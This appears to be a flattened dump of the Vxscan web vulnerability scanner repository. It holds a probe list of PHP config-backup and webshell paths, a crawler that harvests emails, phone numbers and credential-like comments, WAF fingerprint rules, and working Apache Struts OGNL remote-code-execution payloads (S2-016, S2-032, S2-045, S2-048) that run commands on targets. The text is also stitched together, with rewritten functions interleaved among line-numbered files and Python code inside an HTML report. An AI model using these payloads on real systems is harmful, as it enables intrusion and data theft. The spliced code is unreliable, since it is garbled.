            console('DnsCheck', host, "Timeout\n")
        except Exception as e:
            logging.exception(e)
            return False
concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: 112 | result = {executor.submit(self.check, i): i for i in self.hosts} 113 | for future in concurrent.futures.as_completed(result, timeout=3): 114 | future.result() 115 | except (EOFError, concurrent.futures._base.TimeoutError): 116 | pass 117 | except Exception as e: 118 | logging.exception(e) 119 | 120 | if CHECK_DB: 121 | self.check_db(list(set(self.out))) 122 | 123 | return self.out 124 | 125 | 126 | if __name__ == "__main__": 127 | start_time = time.time() 128 | active_hosts = ActiveCheck(['1.1.1.1']).pool() 129 | end_time = time.time() 130 | print(active_hosts) 131 | print('\nrunning {0:.3f} seconds...'.format(end_time - start_time)) 132 | -------------------------------------------------------------------------------- /data/path/php.txt: -------------------------------------------------------------------------------- 1 | /phpMyAdmin 2 | /xmlrpc.php 3 | /phpinfo.php 4 | /memadmin/index.php 5 | /pma/index.php 6 | /phpMyAdmin/index.php 7 | /.mysql.php.swp 8 | /.data.php.swp 9 | /.database.php.swp 10 | /.settings.php.swp 11 | /.config.php.swp 12 | /config/.config.php.swp 13 | /.config.inc.php.swp 14 | /config.inc.php.bak 15 | /php.ini 16 | /wp-config.php 17 | /configuration.php 18 | /sites/default/settings.php 19 | /config.php 20 | /config.inc.php 21 | /data/config.php 22 | /data/config.inc.php 23 | /data/common.inc.php 24 | /include/config.inc.php 25 | /mysql.php 26 | /apc.php 27 | /upfile.php 28 | /b.php 29 | /data.php.bak 30 | /config/config.php 31 | /ckeditor/samples/sample_posteddata.php 32 | /sql.php 33 | /test2.php 34 | /phpmyadmin/index.php 35 | /x.php 36 | /index.php.bak 37 | /config.php.bak 38 | /t.php 39 | /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php 40 | /ueditor/php/getRemoteImage.php 41 | /.index.php.swp 42 | /editor/ckeditor/samples/sample_posteddata.php 43 | /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php 
44 | /php.php 45 | /debug.php 46 | /pi.php 47 | /_phpmyadmin/index.php 48 | /cmdxway.php 49 | /wp-config.php.inc 50 | /.wp-config.php.swp 51 | /wp-config.php.bak 52 | /inc/config.inc.php 53 | /License/index.php 54 | /igenus/login.php 55 | /webmail/index.php 56 | /index.php/chuhades 57 | /index.php?m=admin 58 | /test1.php 59 | /phpinfo1.php 60 | /info1.php 61 | /phpversion.php 62 | /wbl.php 63 | /mytag_js.php 64 | /out.php 65 | /index.php 66 | /mp.php 67 | /laobiao.php 68 | /90sec.php 69 | /e7xue.php 70 | /xsvip.php 71 | /md5.php 72 | /xiaoy.php 73 | /read.php 74 | /moon.php 75 | /result.php 76 | /m7lrv.php 77 | /web.php 78 | /1.php 79 | /asd.php 80 | /mybak.php 81 | /backup.php 82 | /login.php 83 | /myjs.php 84 | /lequ.php 85 | /uploadye.php 86 | /404.php 87 | /ad_js.php 88 | /coon.php 89 | /Config_Shell.php 90 | /bakup.php 91 | /ioandlko.php 92 | /weki.php 93 | /css.php 94 | /admin_login.php 95 | /date.php 96 | /link.php 97 | /service.php 98 | /sky.php 99 | /spider.php 100 | /tag.php 101 | /functions.php 102 | /myships.php 103 | /97sec.php 104 | /coco.php 105 | /av.php 106 | /mycak.php 107 | /akismet.php 108 | /cm.php 109 | /gh.php 110 | /da.php 111 | /mb.php 112 | /config_updat.php 113 | /Thumbs.php 114 | /shingeng_ukl.php 115 | /shell.php 116 | /funstats.php 117 | /selectgino.php 118 | /conn.lib.php 119 | /menb.php 120 | /newfile.php 121 | /config.in.php 122 | /config2.php 123 | /xiaoma.php 124 | /left.php 125 | /c.php 126 | /indexl.php 127 | /dede.php 128 | /HENYG.php 129 | /90000.php 130 | /digg.php 131 | /qingtian.php 132 | /userr.php 133 | /login_wall.php 134 | /xx.php 135 | /3.php 136 | /inCahe.php 137 | /system.php 138 | /tnsado.php 139 | /lx.php 140 | /Hzllaga.php 141 | /en.php 142 | /xiaolei.php 143 | /zdqd.php 144 | /rom2823.php 145 | /shitan.php 146 | /top.php 147 | /eval-stdin.php 148 | /confg.inc.php 149 | /test404.php 150 | /filter.helpear.php 151 | /indexa.php 152 | /cmd.php 153 | /uddatasql.php 154 | /word.php 155 | /modurnlecscache.php 156 | 
/aa.php 157 | /fuck.php 158 | /lucas.php 159 | /seo.php 160 | /flye.php 161 | /suimaoye.php 162 | /base.php 163 | /hxgs.php 164 | /user.php 165 | /words.php 166 | /d.php 167 | /___index.php 168 | /admin.lnc.php 169 | /11m.php 170 | /robots1.php 171 | /mowang.php 172 | /ping.php 173 | /test.php 174 | /bat.php 175 | /footer.php 176 | /stepselet.lib.php 177 | /css_js.php 178 | /3G.php 179 | /good.php 180 | /mcds.php 181 | /hzapi.php 182 | /news.php 183 | /cons.php 184 | /gou.php 185 | /network_lang.php 186 | /database.php 187 | /ms.php 188 | /scan.php 189 | /shopex49.php 190 | /tags.php 191 | /ofc_upload_image.php 192 | /api.php 193 | /zixunpt.php 194 | /error-log.php 195 | /cachee.php 196 | /Pathes.php 197 | /sfn.php 198 | /01.php 199 | /indax.php 200 | /log.php 201 | /config_ucenter.php 202 | /dest.php 203 | /winge.php 204 | /pdf.php 205 | /shantao.php 206 | /sqzr.php 207 | /12345.php 208 | /dict.php 209 | /member.php 210 | /canshi.php 211 | /i.php 212 | /404test.php 213 | /21.php 214 | /inc.constants.php 215 | /lie.php 216 | /usr.php 217 | /xxx.php 218 | /diy.php 219 | /php_meter.php 220 | /phpjm.php 221 | /rss.tpl.php 222 | /config_data.php 223 | /mcli.php 224 | /me.php 225 | /webb.php 226 | /xm.php 227 | /yesu.php 228 | /admin.php 229 | /dialog_sides.php 230 | /income.inc.php 231 | /que.php 232 | /lunqiaofan.php 233 | /bafang.php 234 | /lu.php 235 | /pmo.php 236 | /class.php 237 | /myship.php 238 | /product.php 239 | /qode.php 240 | /cishan.php 241 | /plus_ask.php 242 | /cai.php 243 | /diaosi.php 244 | /lists.php 245 | /samplc.php 246 | /search.php 247 | /datas.php 248 | /diretory.php 249 | /flock.php 250 | /memChk1.php 251 | /small.php 252 | /zhuogouxi.php 253 | /91_1.php 254 | /buy.php 255 | /caicai.php 256 | /cookie.helpea.php 257 | /favicon.php 258 | /testpass.php 259 | /Admin_.php 260 | /assert.php 261 | /memChk21.php 262 | /pass.php 263 | /shell.lib.php 264 | /NewFile.php 265 | /a.php 266 | /editor.php 267 | /jz.php 268 | /l0s4r.php 269 | /qwe123.php 270 | 
/resd.php 271 | /specialtopic.php 272 | /vdimgck.php 273 | /accw.php 274 | /adsitemList.php 275 | /cachedata.end.php 276 | /cituxian.php 277 | /editpwwd.php 278 | /imgarl.php 279 | /info.php 280 | /memChk.php 281 | /test8319.php 282 | /trigger.php 283 | /wall_login.php 284 | /xie.php 285 | /zhuitanyun.php 286 | /about_safe_key.php 287 | /fix.php 288 | /jian.php 289 | /modules.php 290 | /time.php 291 | /tyuij.php 292 | /zhang.php 293 | /Common.php 294 | /andeveoyou.php 295 | /bigdata2018.php 296 | /4.php 297 | /php-cgi 298 | /php.cgi 299 | /tunnel.nosocket.php 300 | /ajax_create_folder.php 301 | /anchor.php 302 | /feedback.php 303 | /soap.php 304 | /?phpinfo=1 305 | /excel/sso_user_export.php 306 | /excel/user_export.php 307 | /excel/server_export.php 308 | /chrome.php 309 | /chrome1.php 310 | /index1.php 311 | /cmd2.php 312 | /cmd3.php -------------------------------------------------------------------------------- /script/apache_struts_all.py: -------------------------------------------------------------------------------- 1 | # author: al0ne 2 | # https://github.com/al0ne 3 | 4 | import random 5 | import http.client 6 | from urllib import request 7 | from lib.Requests import Requests 8 | from lib.verify import get_list 9 | 10 | vuln = ['java', 'jsp'] 11 | 12 | 13 | class StrutsCheck: 14 | def __init__(self, ip): 15 | self.url = ip 16 | self.result = [] 17 | self.random = random.randint(100000000, 200000000) 18 | self.win = 'set /a ' + str(self.random) 19 | self.linux = 'echo ' + str(self.random) 20 | self.timeout = 3 21 | self.req = Requests() 22 | 23 | def st016(self): 24 | payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + self.linux + 
"%27%29.getInputStream%28%29%29%7D" 25 | try: 26 | r = self.req.get(self.url + payload) 27 | if str(self.random) in r.headers['Location'] and len(r.headers['Location']) < 15: 28 | self.result.append('Apache S2-016 Vulnerability: ' + self.url) 29 | except: 30 | pass 31 | 32 | def st032(self): 33 | payload = r"/?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format( 34 | self.linux) 35 | try: 36 | r = self.req.get(self.url + payload) 37 | if str(self.random) in r.text and len(r.text) < 11: 38 | self.result.append('Apache S2-032 Vulnerability: ' + self.url) 39 | except: 40 | pass 41 | 42 | def st045(self): 43 | try: 44 | cmd = self.linux 45 | header = dict() 46 | header[ 47 | "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 48 | header[ 49 | "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 50 | r = request.Request(self.url, headers=header) 51 | text = request.urlopen(r).read() 52 | except http.client.IncompleteRead as e: 53 | text = e.partial 54 | except Exception: 55 | pass 56 | if 'text' in locals().keys(): 57 | self.random = str(self.random) 58 | if self.random.encode('utf-8') in text and len(text) < 15: 59 | self.result.append('Apache S2-045 Vulnerability: ' + self.url) 60 | 61 | def st048(self): 62 | cmd = self.linux 63 | payload = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&age=123&__cheackbox_bustedBefore=true&description=123" 64 | payload = payload.encode('utf-8') 65 | try: 66 | r = request.urlopen(self.url + 
def dedup_url(urls):
    """Deduplicate crawled URLs by their parent path segment.

    Among URLs whose path shares the same second-to-last segment (e.g.
    '/news/1' and '/news/2' both key on 'news') only the first encountered
    survives; URLs without such a segment are kept unconditionally.

    Note: the initial set() pass randomizes order, so which representative
    survives a key collision is not deterministic (unchanged behaviour).
    """
    seen_keys = []
    okurl = []
    for link in list(set(urls)):
        segments = parse.urlparse(link).path.split('/')
        # Guard: a path such as '' or a bare schemeless host yields a single
        # segment; indexing [-2] on it used to raise IndexError.
        key = segments[-2] if len(segments) >= 2 else ''
        if key:
            if key not in seen_keys:
                seen_keys.append(key)
                okurl.append(link)
        else:
            okurl.append(link)
    return okurl
r'jquery|bootstrap|adsbygoogle|angular|javascript|#|vue|react|51.la/=|map\.baidu\.com|canvas|cnzz\.com|slick\.js|autofill-event\.js|tld\.js|clipboard|Chart\.js', 48 | i): 49 | if '://' not in i: 50 | i = re.sub(r'^/|^\.\./', '', i) 51 | i = self.host + '/' + i 52 | self.js.append(i) 53 | except (AttributeError, AttributeError, ValueError): 54 | pass 55 | except Exception as e: 56 | logging.exception(e) 57 | 58 | def extr(self, url, body): 59 | # html页面内提取邮箱 60 | email = re.findall(r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body) 61 | if email: 62 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Email: ' + x, email))) 63 | # html页面内提取手机号 64 | phone = re.findall( 65 | r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b', 66 | body) 67 | if phone: 68 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Phone: ' + x, phone))) 69 | # html注释内提取ip地址 70 | ipaddr = re.findall( 71 | r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)', 72 | body) 73 | if ipaddr: 74 | self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr))) 75 | # html注释内提取https连接 76 | links = re.findall(r'(?<=<!--).{0,120}((?:http|https):[\w\./\?\-=&]+).{0,120}(?=-->)', body) 77 | if links: 78 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links))) 79 | # html注释内提取a连接 80 | links2 = re.findall(r'(?<=<!--).{0,120}a\shref="([\-\w\.\?:=\&/]+)".{0,120}(?=-->)', body) 81 | if links2: 82 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links2))) 83 | links3 = re.findall( 84 | 
r'(?<=<!--).{0,120}\b(?:usr|pwd|uname|uid|file|upload|manager|webadmin|backup|account|admin|password|pass|user|login|secret|private|crash|root|xxx|fix|todo|secret_key|token|auth_token|access_token|username|authkey|user_id|userid|apikey|api_key|sid|eid|passwd|session_key|SESSION_TOKEN|api_token|access_token_secret|private_key|DB_USERNAME|oauth_token|api_secret_key|备注|笔记|备份|后台|登陆|管理|上传|下载|挂马|挂链)\b.{0,120}(?=-->)', 85 | body) 86 | if links3: 87 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links3))) 88 | 89 | def parse_html(self, host): 90 | try: 91 | r = self.req.get(host) 92 | self.jsparse(r) 93 | self.extr(r.url, r.text) 94 | urlparse = parse.urlparse(host) 95 | domain = urlparse.netloc 96 | if not self.domain: 97 | self.domain = domain 98 | html = etree.HTML(r.text) 99 | result = html.xpath('//a/@href') 100 | for link in result: 101 | if not re.search('#|mail*|^/$|javascript', link): 102 | if 'http' not in link: 103 | if urlparse.netloc: 104 | link = urlparse.scheme + '://' + urlparse.netloc + '/' + link 105 | else: 106 | link = 'http://' + host + '/' + link 107 | if domain in link: 108 | if '=' not in link: 109 | self.urls.append(link) 110 | except (UnboundLocalError, AttributeError, ValueError): 111 | pass 112 | except Exception as e: 113 | logging.exception(e) 114 | 115 | self.urls = dedup_url(self.urls) 116 | 117 | return list(set(self.urls)) 118 | 119 | def pool(self): 120 | result = self.parse_html(self.host) 121 | try: 122 | with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor: 123 | futures = [executor.submit(self.parse_html, i) for i in result] 124 | for future in concurrent.futures.as_completed(futures, timeout=3): 125 | future.result() 126 | except (EOFError, concurrent.futures._base.TimeoutError): 127 | pass 128 | except Exception as e: 129 | logging.exception(e) 130 | 131 | jslink = JsLeaks().pool(self.js) 132 | 133 | self.result.extend(jslink) 134 | self.result = list(set(self.result)) 135 | 136 | for i in 
def get_list(ip, ports):
    """Turn "service:port" pairs (e.g. ["http:80", "https:443"]) into base URLs.

    Rules, unchanged from the original behavior:
    - plain ``http:80`` is dropped when a 443 service is also present
    - ``http:443`` is assumed to be TLS and upgraded to ``https://``
    - default ports (``:80`` / ``:443``) are stripped from the final URL

    NOTE: mutates *ports* when it removes 'http:80' (kept for backward
    compatibility with existing callers).

    :param ip: host/IP, normalized through parse_host()
    :param ports: list of "service:port" strings
    :return: deduplicated list of URLs
    """
    result = []
    if 'http:80' in ports and ('http:443' in ports or 'https:443' in ports):
        ports.remove('http:80')
    # hoisted out of the loop: parse_host(ip) is loop-invariant
    host = parse_host(ip)
    for item in ports:
        server, port = item.split(':')
        server = server.lower()
        if server == 'http' and port != '443':
            # the anchored sub is a no-op for any non-default port
            result.append(re.sub(r':80$', '', 'http://' + host + ':' + port))
        elif server == 'http' and port == '443':
            # BUGFIX: anchor ':443$' like the sibling branches, so only the
            # trailing port is removed (never a ':443' elsewhere in the host)
            result.append(re.sub(r':443$', '', 'https://' + host + ':' + port))
        elif server == 'https':
            result.append(re.sub(r':443$|:80$', '', 'https://' + host + ':' + port))

    return list(set(result))
def get_md5():
    """Produce a random 8-digit token together with its MD5 hex digest.

    :return: two-element list ``[plain, md5_hexdigest]``
    """
    token = ''.join(random.choice('0123456789') for _ in range(8))
    digest = hashlib.md5(token.encode('utf-8')).hexdigest()
    return [token, digest]
def verify_country(url):
    """Return True when *url* begins with a country/language label such as
    "cn.example.com", False otherwise.

    Used to filter localized mirrors of the same site (same source code,
    different language).  Anything containing an IPv4-looking dotted quad is
    never treated as a country host.

    :param url: hostname or URL string
    :return: bool
    """
    # Same dotted-quad short-circuit the original used: any IPv4-looking
    # substring anywhere in the string returns False immediately.
    if re.search(r'\d+\.\d+\.\d+\.\d+', url):
        return False

    # One set-membership test replaces ~180 per-call regex searches; every
    # original pattern had the form r'^xx\.', i.e. "starts with CODE + dot".
    prefixes = frozenset((
        'ad ae af ag ai al am ao ar at au az bb bd be bf bg bh bi bj bl bm '
        'bn bo br bs bw by bz ca cf cg ch ck cl cm cn co cr cs cu cy cz de '
        'dj dk do dz ec ee eg es et fi fj fr ga gb gd ge gf gh gi gm gn gr '
        'gt gu gy hk hn ht hu id ie il in iq ir is it jm jo jp ke kg kh kp '
        'kr kt kw kz la lb lc li lk lr ls lt lu lv ly ma mc md mg ml mm mn '
        'mo ms mt mu mv mw mx my mz na ne ng ni nl no np nr nz om pa pe pf '
        'pg ph pk pl pr pt py qa ro ru sa sb sc sd se sg si sk sl sm sn so '
        'sr st sv sy sz td tg th tj tm tn to tr tt tw tz ua ug us uy uz vc '
        've vn ye yu za zm zr zw en'
    ).split())

    head, dot, _rest = url.partition('.')
    return bool(dot) and head in prefixes
CDN|headers|X-Fastly-Request-ID|\w+', 'limelight CDN|headers|Set-Cookie|limelight', 22 | 'CacheFly CDN|headers|BestCDN|CacheFly', 'maxcdn CDN|headers|X-CDN|maxcdn', 23 | 'DenyAll|headers|Set-Cookie|\Asessioncookie=', 'AdNovum|headers|Set-Cookie|^Navajo.*?$', 24 | 'dotDefender|headers|X-dotDefender-denied|1', 'Incapsula CDN|headers|X-CDN|Incapsula', 25 | 'Jiasule|headers|Set-Cookie|jsluid=', 'KONA|headers|Server|AkamaiGHost', 'ModSecurity|headers|Server|NYOB', 26 | 'ModSecurity|headers|Server|NOYB', 'ModSecurity|headers|Server|.*mod_security', 27 | 'NetContinuum|headers|Cneonction|\Aclose', 'NetContinuum|headers|nnCoection|\Aclose', 28 | 'NetContinuum|headers|Set-Cookie|citrix_ns_id', 'Newdefend|headers|Server|newdefend', 29 | 'NSFOCUS|headers|Server|NSFocus', 'Safe3|headers|X-Powered-By|Safe3WAF', 'Safe3|headers|Server|Safe3 Web Firewall', 30 | 'Safedog|headers|X-Powered-By|WAF/2\.0', 'Safedog|headers|Server|Safedog', 'Safedog|headers|Set-Cookie|Safedog', 31 | 'Safedog|content|content|404.safedog.cn/images/safedogsite/broswer_logo.jpg', 'SonicWALL|headers|Server|SonicWALL', 32 | 'ZenEdge Firewall|headers|Server|ZENEDGE', 'WatchGuard|headers|Server|WatchGuard', 33 | 'Stingray|headers|Set-Cookie|\AX-Mapping-', 'Art of Defence HyperGuard|headers|Set-Cookie|WODSESSION=', 34 | 'Sucuri|headers|Server|Sucuri/Cloudproxy', 'Usp-Sec|headers|Server|Secure Entry Server', 35 | 'Varnish|headers|X-Varnish|.+', 'Varnish|headers|Server|varnish', 'Wallarm|headers|Server|nginx-wallarm', 36 | 'WebKnight|headers|Server|WebKnight', 'Yundun|headers|Server|YUNDUN', 'Teros WAF|headers|Set-Cookie|st8id=', 37 | 'Imperva SecureSphere|headers|X-Iinfo|.+', 'NetContinuum WAF|headers|Set-Cookie|NCI__SessionId=', 38 | 'Yundun|headers|X-Cache|YUNDUN', 'Yunsuo|headers|Set-Cookie|yunsuo', 'Immunify360|headers|Server|imunify360', 39 | 'ISAServer|headers|Via|.+ISASERVER', 'Qiniu CDN|headers|X-Qiniu-Zone|0', 'azion CDN|headers|Server|azion', 40 | 'HyperGuard Firewall|headers|Set-cookie|ODSESSION=', 
'ArvanCloud|headers|Server|ArvanCloud', 41 | 'GreyWizard Firewall|headers|Server|greywizard.*', 'FortiWeb Firewall|headers|Set-Cookie|cookiesession1', 42 | 'Beluga CDN|headers|Server|Beluga', 'DoSArrest Internet Security|headers|X-DIS-Request-ID|.+', 43 | 'ChinaCache CDN|headers|Powered-By-ChinaCache|\w+', 'ChinaCache CDN|headers|Server|ChinaCache', 44 | 'HuaweiCloudWAF|headers|Server|HuaweiCloudWAF', 'HuaweiCloudWAF|headers|Set-Cookie|HWWAFSESID', 45 | 'KeyCDN|headers|Server|KeyCDN', 'Reblaze Firewall|headers|Set-cookie|rbzid=\w+', 46 | 'Distil Firewall|headers|X-Distil-CS|.+', 'SDWAF|headers|X-Powered-By|SDWAF', 47 | 'NGENIX CDN|headers|X-NGENIX-Cache|HIT', 'FortiWeb|headers|Server|FortiWeb.*', 48 | 'Naxsi|headers|X-Data-Origin|naxsi-waf', 'IBM DataPower|headers|X-Backside-Transport|\w+', 49 | 'Cisco ACE XML Gateway|headers|Server|ACE\sXML\sGateway', 'AWS WAF|headers|Server|awselb.*', 50 | 'PowerCDN|headers|Server|PowerCDN', 'Profense|headers|Server|profense', 'CompState|headers|X-SL-CompState|.+', 51 | 'West263CDN|headers|X-Cache|.+WT263CDN-.+', 'DenyALL WAF|content|content|Condition Intercepted', 52 | 'yunsuo|content|content|<img\sclass="yunsuologo"', 'yunsuo|headers|Set-Cookie|yunsuo_session_verify', 53 | 'aesecure|content|content|aesecure_denied.png', 'aesecure|content|content|aesecure_denied.png', 54 | 'aliyun|content|content|errors.aliyun.com', 'aliyun|content|content|cdn.aliyuncs.com', 55 | 'aliyun|headers|Set-Cookie|aliyungf_tc=', 56 | 'Palo Alto Firewall|content|content|has been blocked in accordance with company policy', 57 | 'PerimeterX Firewall|content|content|https://www.perimeterx.com/whywasiblocked', 58 | 'Neusoft SEnginx|content|content|SENGINX-ROBOT-MITIGATION', 59 | 'SiteLock TrueShield|content|content|sitelock-site-verification', 'SonicWall|content|content|nsa_banner', 60 | 'SonicWall|content|content|Web Site Blocked', 'Sophos UTM Firewall|content|content|Powered by UTM Web Protection', 61 | 'd盾|content|content|D盾_拦截提示', 'Alert 
Logic|content|content|<title>Requested URL cannot be found', 62 | 'Alert Logic|content|content|We are sorry, but the page you are looking for cannot be found', 63 | 'Alert Logic|content|content|Reference ID:', 'Approach|content|content|Approach Web Application Firewall', 64 | 'Approach|content|content|Approach infrastructure team', 65 | 'Topsec-Waf|content|content|Topsec Network Security Technology Co.,Ltd', '七牛CDN|content|content|glb.clouddn.com', 66 | '七牛CDN|content|content|glb.qiniucdn.com', '七牛CDN|content|content|cdn.staticfile.org', 67 | '网宿CDN|headers|Server|Cdn Cache Server', '网宿CDN|headers|Server|WS CDN Server', 68 | '网宿CDN|headers|X-Via|Cdn Cache Server', 'DnP Firewall|content|content|Powered by DnP Firewall', 69 | 'DnP Firewall|content|content|dnp_firewall_redirect', '华为防火墙|headers|Server|Eudemon.+', 70 | 'Incapsula-WAF|headers|set-cookie|incap_ses_', 'Incapsula-WAF|headers|set-cookie|incap_visid_83_', 71 | 'RackCorp-CDN|headers|server|^[\s]*rackcorpcdn', 'RackCorp-CDN|headers|server|^[\s]*rackcorpcdn\/([\d\.]{3,6})') 72 | -------------------------------------------------------------------------------- /report/report.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Vxscan Report 7 | 8 | 9 | 24 | 25 | 26 |

27 | 28 | 29 | 38 | 39 | 40 | 41 | 42 |
43 | 75 |
76 | 77 |
78 | 79 | 80 |
    def __init__(self, url, html, headers):
        """
        Initialize a new WebPage object.

        Parameters
        ----------
        url : str
            The web page URL.
        html : str
            The web page content (HTML)
        headers : dict
            The HTTP response headers
        """
        # if use response.text, could have some error
        # NOTE(review): the comment above suggests callers pass the raw body
        # rather than response.text (encoding pitfalls) — confirm with callers.
        self.html = html
        self.url = url
        self.headers = headers
82 | 83 | 84 | 85 | 86 | 87 | 227 | 228 | -------------------------------------------------------------------------------- /plugins/PassiveReconnaissance/wappalyzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | import json 5 | import logging 6 | import re 7 | 8 | from bs4 import BeautifulSoup 9 | 10 | 11 | class WebPage(object): 12 | """ 13 | Simple representation of a web page, decoupled 14 | from any particular HTTP library's API. 15 | """ 16 | 17 | def __init__(self, url, html, headers): 18 | """ 19 | Initialize a new WebPage object. 20 | 21 | Parameters 22 | ---------- 23 | 24 | url : str 25 | The web page URL. 26 | html : str 27 | The web page content (HTML) 28 | headers : dict 29 | The HTTP response headers 30 | """ 31 | # if use response.text, could have some error 32 | self.html = html 33 | self.url = url 34 | self.headers = headers 35 | 36 | # Parse the HTML with BeautifulSoup to find